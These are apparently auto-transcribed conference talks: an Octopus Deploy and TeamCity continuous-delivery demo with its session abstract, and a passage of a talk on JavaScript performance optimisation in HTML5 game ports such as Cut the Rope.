dot, git commit. Yay. New changes. And we'll commit that. And we'll come over here and take a look at our team city. If we come back to our project view, we're going to see that team city is watching our repository and it will go ahead and pick up that pending change or make a liar out of me. Let's see. Oh, there we go. Picked up our pending change. You can see here. And after a very short delay, it will automatically kick off the build because I've told this, hey, every time there's a change, kick off a build. So there it goes. I think it's got a 60-second delay built in. So it kicked off our build for us automatically. And now we're building 2.0.7.26. I'm sure you guys can see that here. This build is running. You click on it and see the details. And luckily, it's a pretty simple project. It doesn't take too terribly long to run the build. And it's going to start to show us what steps it's taking. You see this here. Okay, it's updating the resources. It's running our Visual Studio build. It already ran the Nougat package install because there was no new Nougat packages, so it used the cached ones. And now it's publishing those. And hey, great, it created Octopus Deploy, waiting for one deployment. Let's go check out Octopus Deploy. Let's see what's happening on our dashboard. Ah, look at that. We've got a deployment in progress. Right there on our dashboard, everybody can know. Hey, cool, we're pushing out the latest changes to 2.0.7.26. This is good stuff. Great, successful deployment. Let's go take a look. In our development environment, we hit refresh, and hey, looky there. Now we've swapped our title around. Great change. New version number has been published as well, which is also coming from an Octopus variable. So awesome. That looked pretty good. And let's go ahead and at the same time, say we want to push that to staging. Well, cool. We'll just come back like we did before. Tell it we want to promote it. To staging. Go. Do your thing. Excellent. Now we can deploy our next new version. So we'll let that do its thing, and we'll come back over here. So these variables and transformations are actually really, really powerful. It uses the same concept of the web config transform, but it applies it to any kind of file. By default, it's going to go through and look for a star.release.config, whether that's web.release.config, app.release.config, and it's going to go ahead and apply that first on every deployment. And then it's going to look for a star.environment.config. So if you have web.staging.config that has a bunch of settings in it, it'll go apply that when it does the deployment to staging. This is how it supports the build once deploy everywhere model. Because now your config transformation is no longer tied to your build process. It's tied to your deployment process, which is where you want it. Because those configuration values don't need to change at build time. They need to change based on the environment the code is headed into. You can also define any custom files. You can say, hey, look, go look for this file and apply config transforms across that as well. So in addition to just applying a config transform between two files, it'll also substitute in any variables that you have to find. I showed you that variables grid. So it's going to automatically look at the connection string section of your config file and sub those in, which is great. And you can actually set some sensitivity and access level on these variables. So maybe your developers have access to your octopus deploy portal. Which your production ops team says, well, I'm not giving you the connection strings for our production database. And as a developer, I don't want the connection strings for the production database. That's more responsibility than I'm looking to take on. But they can go and input those variables in and say, great, these variables are going to be available during the deployment. But we're not going to show them to you in log files. And we're not going to let people who aren't authorized see these variables. Awesome. That's going to make your ops guys really happy. This stuff can happen automatically, and they don't have to give you the password. Great. It's going to go through and look in, as we saw, your app settings of all these things and apply your variables into there. And then it's also going to make all of those variables that you have defined in the portal available to any of those PowerShell scripts we talked about, the deploy.ps1, pre-deploy.ps1. So you can take action based on those variables whenever you are running your own scripts. OK, more demo. So this is all fine and good. We've got this creating our build and deploying to dev every time. Great. Now we can test. Well, let's say that we decide what we want to do is we want to push out, oh, Lord, I broke it. Well, that's not good. Let's see what we did here. Probably killed the service. Let's see. We'll find our TeamCity server. We'll start that service back up. Not sure what happened there. Let's go see. OK, TeamCity is warming back up. So let's say that we want to make sure that every night we want to produce a nightly build for people to go test and use and publish that somewhere. I don't want to have to go do it every night. I want it to be automated. That's why I automate the things. Well, I can set up in TeamCity a build step that's called nightly that's set on a schedule to run every night at, I don't know, 8 p.m. or something and grab the latest change out of Dev and promote it to our staging environment. And if TeamCity ever warms itself up, I will show you that. You know, we're running short on time, so that's not that interesting of a demo anyway. Let's move on to something cooler. One of the cool things that you can do with this whole promote concept is you can also have it run smoke or integration tests before it promotes to the next environment, right? So if I set up this nightly build, let's say I've written a bunch of selenium tests to go out and test my website or I've written a bunch of end unit tests that are going to run integration test calls against my API. I can script that out to run in TeamCity and go ahead and say, all right, well, cool, run this and if those paths then promote that build from Dev to nightly, right? But if they fail, then don't do it and notify me about it. Now one of the other things I mentioned that's really important in Octopus deploy is that it creates an audit trail. Let's have a look at what our audit trail looks like. First off, you can see right here from the deployment that we've got nice logging. Let's look at our task log. We can see all the steps that were taken. I can see that it acquired these packages and where it got them and what version it used and it's going to tell me all about how it decided to deploy these things. It's going to go through here and show me what it did in order to deploy this tentacle and how it actually ran this deployment. So tentacles are an interesting concept in Octopus deploy. Let's come look at our environments page. Here you can see where I've defined my development staging and production environments. Each machine that I deployed to is called a tentacle in Octopus. Just taking the metaphor a little further. You install a Windows service on there called the Octopus tentacle service that is listening for commands from the Octopus server. Whenever it receives a command to do a deployment, it starts following those instructions that I've defined out in my Octopus deploy process. It will come in here and deploy these applications into these particular folders that it runs. So if I come in here and look at the C Octopus folder under applications, I've got a folder for each one of the environments that exists on this tentacle. In development, you'll see each one of my applications and in there you'll see a package. You'll see a semantic versioning folder for each one of the deployments I've run and it going up for each one. This is really powerful in that, say with an IIS website, when Octopus deploy runs this deployment, it unzips it into a whole new folder and gets everything ready to go, performs all those transforms so everything is ready to launch. And then it goes to IIS and says, well, let me go ahead and just swap your home directory on this folder. So instead of pointing at 2.0.7.24, I'm now going to point it at.25. This is really valuable because now your old version is still there. If you absolutely had to roll back, you just have to go point an IIS directory back. Of course, the nice thing about Octopus deploy is that it's repeatable so I could just go back and say, you know what? Redeploy version.24 and it's going to go back and redeploy the version exactly as it sat at.24. Now this is valuable because if you have written any, say, deployment scripts, like a deploy.ps1 or something to handle your deployment process, since that is checked in alongside your application, it's versioned with your application. And that means that, let's say it's a website and you've got some static assets that are served out of a folder called dist. And for whatever reason, you decide you need to change the name of that folder to public. So you go and change your deploy.ps1 that's generating those static assets to start putting them into.public. If your build script is centrally managed, then if you have to go redeploy an old version of your app, now it's putting the static assets in the wrong place. The old version expects them to be under dist, but now your build script is putting them under public. By having your build script versioned along with your application, redeploying an old version is still going to work because it's going to use the version of the build script as it existed at the time that that package was created. It's also going to snapshot all of the variables that you could define in your Octopus deploy portal with that version. So even if you go and change a connection string or a variable for future deployments, redeploying that old version to any environment is still going to use the snapshot of the variables as they existed at that time. What about the database? That's the biggest question I always get with Octopus deploy. My answer is, what about the database? No. Octopus deploy doesn't have any built-in support for database deployment. It doesn't have any database magic built in, mostly because database deployments are hard if you guys have tried that. There are a few tools out there that will help. I have previously set up a system in the past where we were using Redgate's SQL source control product, if you guys have seen that, that lets you check all your database scripts and everything into your Git repository and it automatically versions them and everything. It set up a system where I was using that and then using Redgate's SQL compare command line tool that I ran in an Octopus deploy package that would go ahead and compare the scripts as they existed at that version to whatever environment I was deploying into and it would apply those changes. It didn't work worth a damn. That command line tool was not very good and it would fail on all random stuff all the time. There is a few other products depending on how you do your database development that are like Roundhouse that you can actually version your scripts right there with your app and run it. That's one way you can go about your database deployment. Another tool is called Ready Roll SQL and it integrates in Visual Studio and uses the SQL database project types and does kind of a similar concept where it goes ahead and versions your database and creates a version table in there so it knows what version you're deploying and what scripts go with that version and will apply those migrations for you. Database migrations are great as long as you're going forward. Going back to database is a big problem but that brings up a really interesting point. As you get into continuous delivery you're going to find that rollbacks become a thing of the past. A rollback is not something you should really do. When you have a good continuous delivery system and you have good repeatable automated deployments there becomes less and less need to roll back simply because if you found something wrong with your deployment there was a bug in your software or some kind of problem. It's really a lot easier I found to most of the time just go fix that bug, commit it, rebuild the package and push out the new deployment, roll forward instead of rolling backward because do you really want to abandon your new deployment just to go fix a bug or would you rather say hey let's get all these features out here and fix this bug. When you've got a good fast repeatable system it becomes really easy to do that. So let's take a look at what kind of stuff we can do with our deployment process in Octopus. If I come here on the process tab you see I've got all these steps like notify release manager and approval and then deploying all these NuGet packages. If I click add step we'll look at all the things that are available to us. I can tell it I want to deploy a NuGet package. I can tell it I want to run a random PowerShell script maybe this script handles pulling a server out of a load balancer and then at the end I want to put it back in. I can send an email, I can say that there's manual intervention required, we'll show that in just a minute. I can tell it I want to deploy something to Windows Azure, upload something over FTP. So let's take a look at these email and approval steps because these are really interesting. If I come over here to our releases and we've got this O.26 release and we've deployed it to development and we've deployed it to staging and it's been all signed off by QA and said this thing is ready to go to production let's send it out. Okay well I'm just a developer I don't have permission to deploy to production but I'm going to go ahead and do it anyway because you know hey come stop me if you don't like it right. Well guess what somebody has already set this up so that whenever I go and deploy this release to production it says oh and look at this this little guy popped up and said on my little local mail server here saying that an email has been sent let's view that message. So here's this nice email that came in that says hey release dude ready to deploy this version to production and follow the link below to approve this and if I was in a real mail client it would be clickable but I'm not so we're going to copy and paste. So we will copy this lovely lovely link here and let's go take a look at the current status of octopus deploy and look at this it's paused even if we go to our dashboard we can see hey this is waiting it's chilling it's not doing anything yet and it says here that approval is required and it's assigned to no one let me show the details of that and it says hey a new release is ready for deployment to the production environment click the green button to proceed with deployment now although the button is not green but I don't have permission to do this I'm not in the group that's allowed to release so let me open up an incognito window that does not have my cookies in it and paste this in and we're going to come here and sign in as release dude. So release dude has already signed in and he followed that link he comes here and it says oh okay this needs approval oh look assigned to me let me show the details of that great well I can't interact with you yet because maybe this notification maybe the people who are allowed to approve this there's two or three different people who could approve it so the first one to get there is going to click assign to me and now I get to do this and I can put in notes here and I can say you know maybe I've got a different change management system that change requests have to go through and get all this approval and I can put a reference to that ticket in here if I needed to to say oh yeah this was signed up by all the people I'm just going to say that I'm release dude and I approve this message vote for me and I'm going to click proceed and now it's going to go ahead and finish doing that deployment right well this becomes really really powerful because now you can you can automate the queuing of a production release say you guys do a release to production every night or every two weeks or every quarter whenever it is you could have that scheduled automatically from team city and you have the confidence of knowing it's not just going to send that code out without approval it's going to stop and wait for someone who has the authority to say yes this is ready to go and we're ready to go push it out to production or they could cancel it and say no we're not ready to push this out and that becomes really really nice and then if I go look under oh this guy doesn't this guy is not an octopus administrator so he can't see the configuration so let's go back where I'm the octopus administrator and can view my configuration and say let's look at this audit what all has been going on here okay here we go a deployment was queued ah release dude took responsibility for this and then said yes I approve it let's see the details ah okay cool here's what he did here's how he changed that record great now I've got a nice audit trail and I can even filter this down to say oh I think release dude's been up to no good show me only stuff he's been doing um and I can start sifting through that now the um in our octopus deploy configuration there's this nice little thing in here called the library right so this shows me a my internal uh new get packaging package manager package store where I can view my packages that are here I can manage my external new get feeds if I have any um and then the script modules is really interesting right so I can come in here and I've defined this script module these are basically like PSM one files if you guys have written power shell commandlets um let's say I've got a bunch of power shell that I want to reuse across multiple projects in uh in my octopus deploy settings I can define that here at this level and then make it be included with every project and if I do that then in all of my pre-deploy and post-deploy and deploy dot PS one files this say hello commandlet will be available and I can make it take parameters and I can bind it to octopus variables and this way I can build reusable pieces of functionality right that are centralized but they're not necessarily shared rather than having a whole bunch of if statements that say if it's this project if it's that project I can just include the pieces I need and parameterize it and make that available to my other deployment scripts um and then I've also got a nice thing called step templates this is relatively new um these step templates are where I can define some of those different steps that need to be in my process um that are reusable and what's really cool is that not only can I define my own but there's a community library up here that has currently 46 templates that can do all kinds of cool stuff chocolatey insurer packages installed um you can back up a directory you can do find and replace you can interact with git you can do all this cool stuff with IIS you can create an MSM queue if you need to do that sort of thing um you can notify new relic of your deployment and your deployment is complete um update a rack space load balancer here's SQL execute script if you're using SQL scripts for your database migrations um run in unit and these are contributed by the community so you can write your own scripts and contribute them back to the community right and um you can create local users or get processor load you can do all kinds of cool stuff here and you can take these and include them right into your octopus instance as a step template right or you can define your own so that little notify release manager step that we had before I could say well I always wanted to do that so let me define this at my deployment level that way this one common step can be included with all of my deployments and I can define these parameters that are automatically going to become variables in the project that includes these steps so that becomes a powerful way to share the configuration that you've set up for one project with other projects and then I can also create variable sets so if there's sets of common variables that I use a lot throughout my projects I can define that here so I don't have to repeat those in every project and I can manage them centrally if I need to alright we are just about out of time so let's see and um alright so that's all I have do you guys have any other questions you'd like to ask real quick no yes uh-huh so I assume you're deploying the node stuff to Heroku or you actually are deploying your.NET stuff to Heroku as well okay so could you yeah I mean you could do a deployment if you wanted to if you look at the stuff like the windows azure deployments and things take place on the octopus server rather than the tentacle because obviously there's not a tentacle being installed on azure for a website deployment you can execute a shell script right and some of those step templates that say I'm going to execute this script from the server from the octopus deploy server have get pull and get push right so you could if you really really if you really hated life you could go ahead and package your node.js app in a new get package and and have octopus deploy get push it to Heroku for you I would not recommend it I think you're going to be you're going to be fighting the tool a lot because it just wasn't made to work with non.NET products I would highly recommend using a different tool like maybe code ship it's great for deploying node apps to Heroku but yeah octopus deploy is great for deploying.NET apps it's not great for deploying non.NET apps at the moment right any other questions no okay well thank you very much for your time this morning.
|
One of the main tenets of Agile development is to deliver business value to the production environment early and often. That's easy enough if you are delivering one small web app, but what if your application is composed of several web apps across multiple tiers with a large database and maybe even a few Windows services and scheduled tasks? Now you need a deployment system that is built to scale and allows you to automate all of these tasks to achieve consistency in your deployments. In this session I will show you how Octopus Deploy can make these deployments as simple as the click of button. I will also highlight new features in the 2.0 release such as Guided Failure and audit trails.
|
10.5446/50810 (DOI)
|
Hey, guys. Thanks for sticking around for a very, this will be the, well, at least the very last talk of the day. It's not the best. So, hopefully the best. So, my name is Robbie Ingebrezen. Do you guys recognize Ingebrezen as a Norwegian name? I've never asked this in a, when I've spoken before, but is there anybody here who can tell me how to pronounce my name? How do you do it? Okay, I'm not even going to try. So, my great grandfather was from, and this I will get wrong, but it's SKIEN in Telomark. Cheyenne, I think? Cheyenne? Are you, is anybody from Cheyenne? Do you know Ingebrezen's there? Dang it. We, I just went down there actually on this trip and looked for traces of my family. There's a cemetery there, like the main cemetery, and there's two actually, but the big one, like in the downtown area, and we found a whole bunch of Ingebrezens, which may or may not be relatives, but I hope they are. Anyway, so, it's fun for me to be in Norway where I can pronounce my, say my name and people don't have to look at me in a weird way. So, I'm Robbie Ingebrezen, and then this is Joel Fillmore, my good friend and colleague, and together we are a small company called Pixelab. We're based out of Seattle, although when you're just two people, you can kind of be based out of wherever your living room is that day. So, this week we're based out of Oslo. So, that's another connection that we have to Norway. So, we are focused primarily on HTML5 and JavaScript and sort of the, a web stack, although both of us have history with Microsoft technologies. I was part of the WPF and SilverEye teams. Any Microsoft guys here? Couple? Yay. Does anybody use Kazaml, by chance? It's a little, okay. So, Kazaml is my, I wrote that. And then Joel was on the SharePoint team at Microsoft. So, two really exciting products that brought us together to work on HTML5 applications. And actually we've had pretty good success with HTML5 stuff. We, in fact, we just won a Webby last week for a project that we did with Red Bull. And we're going to talk about some of the other projects that we've done. But our kind of focus in our, I guess our area of interest is sort of forward looking kinds of HTML5 experiences that sort of push the envelope and what you can do inside of a browser. And that's why performance is kind of a natural fit. And so, for that reason, we thought it would be fun to talk about performance and share some of the things that we've learned about JavaScript performance. And that'll be the focus of the talk today. Tomorrow we have another talk, though, where we're talking more about some of the creative aspects of using HTML5 to create forward looking experiences. And that is called the future of extreme web browsing. And I think it's like tomorrow at, anyway, just look it up. Come, though. It's tomorrow at 10 or 11 somewhere around there. So we'd love to see you guys there, too. So this is us. If you want to track us down, thinkpixelab.com. And then that is my Twitter handle, which you are the only country in the world that will remember that. So I don't need to spend too much time there. And we are Canuthians. And I will let Joel tell you what we mean when we say that. All right. So who is Canuth? This guy. So some of you may recognize him. He's a famous computer scientist. He's a professor emeritus at Stanford University. Most people have heard of Donald Canuth from the series of books that he's written, the most famous of which is the Art of Computer Programming. So this is the series of books that every serious programmer has on his bookshelf, but it's never read. It's pretty daunting. I've paged through it a few times, but have not read the whole thing. Donald Canuth is famous with this particular set of books, and I think his others as well. If anyone found an error in the book, he promised to send them a reward. And the reward was a hexadollar, which is 256 cents. And so he would write out the check for a hexadollar. And to date, people take a lot of pride in sort of cashing these checks. And he's written over $20,000 worth of checks, but supposedly very few of those have been cashed because they're kind of like a badge of honor. So he's famous for a number of quotes. We gathered a few of our favorites. This one is Beware of Bugs in the Above Code. I've only proved it correct, not tried it. That's pretty impressive when you have the mental compiler or the mental theorem prover to prove the code correct. The next one is Science is What We Understand Well Enough to Explain to a Computer. Art is Everything Else We Do. This is Robbie's Favorite. I Can't Go to a Restaurant and Order Food because I keep looking at the fonts on the menu. And this is great. You know that Donald Canuth was also the inventor of latex. This is the performance one that we're going to be talking about today. The quote is, we should forget about small efficiencies, say about 97% of the time. Premature optimization is the root of all evil. So when I was beginning my career at Microsoft, I was a new developer. One of the first tasks I was given was to implement a change to a series of data structures that we had to manipulate in a certain way. And so I wrote some code and I was really sort of new at the time. I was worried that it had to be fast. We were working on a server product where lots of concurrent requests could come in. And I was really careful to optimize this so that it would filter down the set of results in an efficient way. And I checked the code in and the next day I noticed that one of my colleagues had basically undone everything that I had written. And so I sort of mentioned, hey, did you, were there problems in what I had written? He said I had to make a few modifications and it was really difficult to understand. And so that particular piece of code we don't have to worry about from a performance perspective because there are so few items in that list. So I rewrote it so that it's a little simpler to understand. And he said, you know that quote, premature optimization is the root of all evil. I didn't know the quote. But I went and looked it up. And it was sort of a lesson to me that we shouldn't focus on optimization until we're absolutely sure it's necessary. So our kind of approach and what we would like to talk about today is the balance between optimizing code and maintaining code. So on one hand you have maintenance where you want code to be easy to understand for people that have to come in and maintain it. You want it to be efficient to write. And you also want it to be optimized for execution. And those are competing interests. So today we're going to talk a little bit about how to balance those interests. The rest of the quote we started off, the beginning is we should forget about small inefficiencies, about 97% of the time. Premature optimization is the root of all evil. The remaining part of the quote is also important. Yet we should not pass up our opportunities in that critical 3%. So that really is the key. It's to use the tools and methods we have to focus on the things that are most important. And for the rest of it, use the principles that guide us in writing easy to maintain, easy to write code. Okay. So we're going to talk about three different things. The first is tools. So we're going to talk about how tools can guide that process to find the 3% that is worth optimizing. Next we'll talk about an approach-based method where looking for different ways to optimize code rather than focusing in on the specific optimizations of a one chunk of code, stepping back and looking at the algorithmic or the method approach to optimizing code. And then third we're going to talk about the process of experimentation and refining. It's an iterative process to get your code in good state. Okay. Real-world examples. The first one we're going to talk about is a game called Cut the Rope. We did, so Cut the Rope, I'm sure many of you are familiar with, it's a very popular iOS, Android game. We did the HTML5 port for Cut the Rope a few years ago. And it was one of the first big, really challenging HTML5 projects that we did. Before we get too far into the details, for those of you who aren't familiar with Cut the Rope, we'll give you a quick video intro. Cut the Rope is a casual game which was initially released for mobile devices. It's essentially a game where you have to deliver candy to the little green monster called Omnom by cutting the ropes. Currently it has been distributed on two platforms and it totally has been downloaded more than 60 million times. It's quite successful. We had this basic concept of delivering something from point A to point B in the very beginning of the game. That's when we got the idea of candy being fed to the little green monster. And that idea was absurd and adorable at the same time. So we thought that it's a good way to go. We have more than 6 million play sessions every day. When we want to expand and HTML5 is just another great platform to expand to, it will bring us much more users, much more players. If any of you guys played Cut the Rope? Okay, so a lot of people. Anybody played on the web? My chance? Awesome. Well, yeah, so that was the project that we did. And it was a big project. Yes, I think when we first started out they gave us the Objective-C code base. It was about 150 files, 15,000 lines of code. They had written their own custom physics engine. So that was a little daunting to see all that code giving a relatively short project timeline to get that ported. The result was about 1.2 megs of JavaScript unminified. It got much better minified. But you kind of get the sense for what a daunting task this was. During the initial development of the project, we did some early prototypes. So we took the ropes, which are sort of the premier element in Cut the Rope. You want those to look amazing. And we wanted to see if we could do one rope. And so the challenges with the ropes are that they used polygons to render those, and they had some pretty complex calculations to do busier curves to make sure that the ropes felt lifelike so that they would swing, the physics felt right, and they looked beautiful. So on the left, you're going to see one of our early prototypes. So this was sort of our first attempt. We ported the code, used the same approach that they did, and this is the result. So you can see that the rope is a little slow. What you're seeing is definitely not 60 frames a second. You can see as the rope sort of curls down, there's some artifacts sort of at the kink where it was difficult to render those polygons in a small amount of area. And on the right is the final version of the game. And so this is sort of one section of the game. It's still a single rope. But there's much more going on in this. You can see that the spider is traversing the path of the rope, which is changing according to the physics engine. The sort of blower up at the top is sending an impulse of wind, which affects the candy, the rope, the path the spider's on. So it's significantly more complicated. There's a lot of elements. So our concern was how do we go from the prototype on the left where we're barely like rendering a rope. It doesn't look great to the full game where we have multiple ropes, multiple game objects, lots of animation, lots of forces going on. And so that was a real concern and challenge. And we weren't sure that we were going to be able to do it. So let's talk about how we did it. The first thing that we did is fire up our profiler and memory debugger. And this was sort of the profile that we got. So you can see that there's actually not that much memory being used. This is over a relatively short period of time. So I think this total period is two seconds. And what you're seeing with that sawtooth pattern is the number of memory allocations go up, and then the garbage collector comes in and goes down. And so we've got at least two or three garbage collections per second there. So sort of the quick intro to how garbage collection works. We've got, well, we're from Seattle, and Seattle drinks a lot of coffee. So the easy way to understand garbage collection is if you had a coffee mug and you had a disposable coffee cup, and imagine you needed to drink, I don't know, 20 cups of coffee every 16 milliseconds. Yeah, 16 milliseconds to draw a frame. And so every sort of object that you allocate has to be collected at some point, right? So maybe it's not that bad if you drink 20. If you drink maybe 100, that's a little more work for the garbage collector. It's going to require more processing time, JavaScript is single threaded. So typically they'll pause and collect the garbage and then let it resume. And it just gets worse and worse. So you can imagine how bad it got. We did the profiler. And there's a couple interesting things in this profiler. Typically when I'm profiling an app, I will sort by the exclusive time. So I'll look at functions where a lot of work is being done. And those are up at the top pretty obvious. So there's bezier calculations, so that's calculating the curves on the rope. There's the constraint engine, which is the physics and the objects and how those interact. Some more bezier calculations. And you can see sort of the difference that the typical approach with JavaScript is methods are underscores or lower case, lower camel case, and objects are uppercase. So there's sort of two objects in there. You can see the vector and the array. So they're not necessarily at the top of the list. They're not taking the most amount of time. They are definitely in the top 10, but they're not the highest. But the count right there is pretty important. So you can see over that two or three second period that we allocated 2.2 million vector objects. That's a lot of vectors. And so you can imagine the amount of pressure that puts on the garbage collector, which has to go in there and collect all those objects that are no longer being used. Similarly with the arrays, that's not as bad as the vector, but 262,000 arrays is pretty significant. So after the profiling, we were able to get this down. So sort of the end game, so you can see the difference from that initial prototype where we had one rope that was barely rendering to the full game. We went from 2.2 million vector allocations down to about 30,000, which is still pretty high. But given the amount of calculations and they're going on the game, it's much, much better. The array allocations we got down significantly as well, 262,000 down to just 400. So how did we do that? We're going to go through a little bit of code. This is the intensive part of the talk. And we'll show you a simple example of how we were able to get rid of those allocations. So on the left, we have the native implementation of a vector. So it's a struct. Those are relatively lightweight. You have some utility methods that are static to add and multiply vectors. Those are pretty straightforward. You add the X and Y coordinate or you multiply by a scalar. And then we have the direct port. So this is sort of our naive direct port implementation of a vector where we would do the same thing. We had a static or a utility method to add two vectors and the same thing for multiply. And so the key here is that new. You're allocating a new vector every time you need to add. So the vectors in this example are used by a game object. So a game object could be omnum. It could be the candy. It could be a piece of the rope. It could be any element in the game. And so it's pretty common for a game object to have a position within the screen. And forces will act upon that game object to move it around. So in this case, we apply an impulse to an object. And basically what that does is it takes the delta or the time slice that has occurred since the last frame was rendered and figures out the distance that the object should move based on the impulse that was applied to that object. So you can see that we're basically doing two things. We're multiplying the impulse force by the time slice to get the offset. And then we're adding that to the position. So that would be basically moving a character according to some speed. So here's our first attempt at reducing the number of allocations. We realized quickly that we're changing the position of a game object or a game element. We don't need to allocate a new vector for that, right? Because he just needs to know his position. We don't need to create a new element and then sign that new element. That's just asking the garbage collector to do extra work to collect that extra element. So the first thing we did was instead of a static method to add a vector which has the new inside there, we created an instance method which adds the X and Y coordinates of another vector to the existing vector. And so this was perfect for the position because the object only needs to keep track of its position. And we move the object according to that impulse. There's no vector added. So we're able to get rid of quite a few vector allocations using techniques like that. So here's the multiply. We can't do the same thing for the multiply though, right? If we were to multiply the impulse vector in place, then it changes the speed of the object. You can't do that. So the strategy there is to use local variables and just do the calculation in place. And this is, again, going back to the quote that we talked about at the beginning, not something that we would do in every place where a vector is used. And similarly, if you have a convenience method that adds a vector, it's okay to use that in the vast majority of cases. You want to use the profiler to guide your optimization and find the chunks of code that are path critical and that are really constraining the frame rate. And so once you find those, you can use the techniques. That's the 3% to really make them run quickly. For extremely critical paths, we found that inlining the function in the same way that the native compiler would do with the inline hint, it would actually inline the code. You can do the same thing with JavaScript by taking simple functions and avoiding the apply impulse function call entirely and just doing the calculations in place. And the results of that, you can kind of see, this slide is a little bit outdated, but you can see the direct port is in blue. The reusing the same vector after we made that change, we got a little bit better performance. Switching to local variables, performance went up significantly. And inline code where we completely avoided any function call was obviously the best. This was done a couple years ago. We tried it just out of curiosity last night and it's really incredible to see the difference that today's browsers have. It was just astronomical the difference. We wouldn't have found the problem in today's browser because the browser is so fast that it hides the problem. It was kind of crazy to see that because we only cut the rope two and a half years ago or something. It wasn't that long ago. I kind of had this feeling that two years ago browsers got really, really fast and then we've just sort of been living the dream. But it turns out that there's been a huge amount of improvement in what a browser, especially the JavaScript engines, across all browsers are doing right now. It would be interesting if you had a chance to go in and compare old browsers versus new browsers. Yeah. JavaScript engines today are really incredible. So we talked about the memory profile at the beginning and you see the sawtooth pattern. After the changes, you can see the difference that reducing those allocations makes. So it's much smoother. And what that translates into is a higher frame rate. So by the time we were able to ship, we were getting 60 frames a second on most devices and we were really, really happy with those results. So Joel did a great job of kind of explaining, I guess, one of the first approaches to performance should be, which is you see a performance problem and you can mostly, as you're writing your code, like Joel said, you can mostly ignore it, right? Don't optimize until you know there's a problem. Then as the problems begin to emerge, and actually, there's a little caveat with that, obviously. We're assuming that you're writing reasonable code as you go, right? Using best practices. But I guess as we're talking about sort of that tension between writing optimized code versus writing readable code, we're saying that it's okay to write readable, reusable, understandable code rather than focusing on the highly optimized code until you see that there's a problem. Now when you see that there's a problem, Joel did a great job describing one of the first approaches you can take, which is to actually look at your code and use the tools to find the hotspots and then once you find the hotspots, then you can address those directly. But there are times when the code just sort of can't be optimized. Like you're trying to accomplish something where the approach actually doesn't allow you to get fast enough. And we ran into this with a project for a game called Contre Jure. Has anybody played this game? It's a little bit less popular than Cut the Rope. It's a super cool game. So those of you who have played it can attest to that. It's really just a super beautiful game. And to understand sort of the pressure we felt in terms of performance, you have to understand who created it. So we wanted to just take a couple of minutes and show you a video. This guy named Max, and I actually don't know his last name, he's a Ukrainian guy and I guarantee this guy is like on the front line right now. But he is dedicated to everything he does. And we had sort of, I guess, the privilege and also the challenge of trying to help import his game to the web. So this is just three minutes about it. Belief in a third world country. You know, the main force that pushes Ukraine forward right now in software development. If it's about gaming scene, it's the stage of early development. We cannot officially buy an Xbox or any Xbox games because we don't have Xbox live in Ukraine. If I create a game for Xbox live, I will have no possibility to buy it. Crazy. My name is Max and I'm head of Mockers games studio. When I started to create games, post match games, it started different market compared to the mobile or Xbox PC, etc. You cannot make a lot of money on a flash market and you need some money to buy pizza and to buy a few for my motorcycles. When I started, I did one game, one month and release. It is how it is done in the flash world. Now everything changes. We have downloadable markets, we have upstores, we have mobile market and it's much easier to create a product for mobile market. When I started to create ContraJewel, I realized that it's something bigger. So I decided not to release it on a flash platform, but to try to make it mobile. Right now, after release of ContraJewel, we are in financial point of view. We are just free. It's very comfortable when you can wake up, just have a few steps and you are at work. For me, everything is the same. It's my work, here are my friends and it's my hobby, it's what I like to do, so it's everything together. A few years ago, I think it was impossible in Ukraine. We had no developed game and scene, now everything changes. Do you think you will always be making games? No, definitely no. If you would ask me the same question, 10 years ago you would ask Max, do you think you would be breakdancing all of your life? Yeah, 10 years ago maybe the answer would be yes, but right now I am a game developer. This gym is 4 times for a week and I have another gym just for breakdancing. The second one is 3 times for a week, so one training for a day. It's actually a gymnastics gym. I do some tricking, some parkour. The floor is not the best here for breakdancing. Actually, it's for gymnastics. I'm not in the best fit, but I still can do something. I do this because I have fun. I enjoy it. Even if I get older and I cannot, for example, win some battles no more, but I still enjoy it. When you work, you work with your brain. You challenge mainly your mind. Here you can challenge your body and when I go out from the training, my mind is totally cleared. It's like a reboot. In the former Soviet Union, we had no breakdancing, no modern street dances. I got very interested and I wanted to try. We stopped it there because it just gets more awesome. That guy is, honestly, we have a huge amount of respect for him and also we know that he could beat us up. When we inherited this project from another agency, this is what he was facing and he was just not happy at all about the way that they were rendering. They call these plasticines. You can see there's like the little, like over, well, I don't know what he's talking about. You can see that there's the native one on the left-hand side and then on, or I guess that would be, on your right-hand side. Then on the left-hand side is what they were rendering inside of HTML5. They were basically just rendering the same object, but making it smaller and using that to produce a gradient. I've enhanced the effect a little bit here. It wasn't quite that bad, but it was pretty bad. He was mad. We took on the project and our job was to come up with a way to render a better highlight on that shape. The thing we ran into is that in the native version of the game, they were using a shader to render that. If you're familiar with the shader, you know that a shader is a tiny little bit of code that you can essentially inject into the GPU and then it runs directly on the GPU. The job of a shader is to evaluate, you know, if it's in 3D to evaluate a triangle or a polygon or if it's in 2D to evaluate an individual pixel or depends on the type of shader, but then modify that pixel according to some small amount of code. GPUs are really, really good at executing this kind of code really, really, really fast. JavaScript engines are not really good at executing that kind of code really, really fast. You can imagine you've got a plasticine that's made up of hundreds of thousands of pixels and to try to execute that code on every single pixel, every single frame is just killing the performance. There's no way to do it. One of the challenges of these plasticines is they're not static. It's not like we could render them once. If you saw during the gameplay, part of the gameplay is to move the plasticines in order to move Petit, who's the main character in the game. It's really a challenge. It's not one of the things where we could render initially and get the shading perfect and then it would be fine. It has to move at the same frame rate as the game because that plasticine is moving, it's contorting its shape. So that's why in that initial implementation they came up with something that actually was really fast, but it did not produce the right result. This was an example where we looked at the code and there was really no way to port the right code over in a way that would essentially meet the performance goals of the game. So the pixel by pixel approach was out. We started looking at some options and the first exercise is we did this little report where we looked at five or six options. The first one we looked at was SVG filters. The thinking here was that SVG has some filters. One of them is a filter that creates an effect like this and we thought maybe we could produce something with that. The issue with this was first of all now we were mixing two media modes because most of the game is rendered into a canvas if you're familiar with that. Then we would have to have this vector object sitting on top of the canvas and then do the job frame by frame to keep those two things in sync. Also you probably know that SVG is not known for its great performance or speed. So we had some concerns about this and worst of all it just didn't look right. So we quickly crossed that one off our list. Then we started trying to break the problem down into chunks. We started thinking are there small bits of the plasticine that we could render individually and then cache some or create if we didn't need to render them that frame or else somehow break the problem down into smaller pieces. So we had this idea what if we divided the plasticine up into this pie and then we can look at each one of those shapes individually only modify the ones that we need to and it kind of breaks the problem down for us to get smaller. We looked at this but we kind of realized that we had problems on the edges where we could break this into multiple pies but kind of on the corners we still had sort of these hard edges. Again it just didn't look right. Plus this quickly began to feel sort of like a tough geometry problem like getting everything to sort of line up properly at the sort of the seams. Our initial hope with this was that we could by dividing it into pie slices eliminate 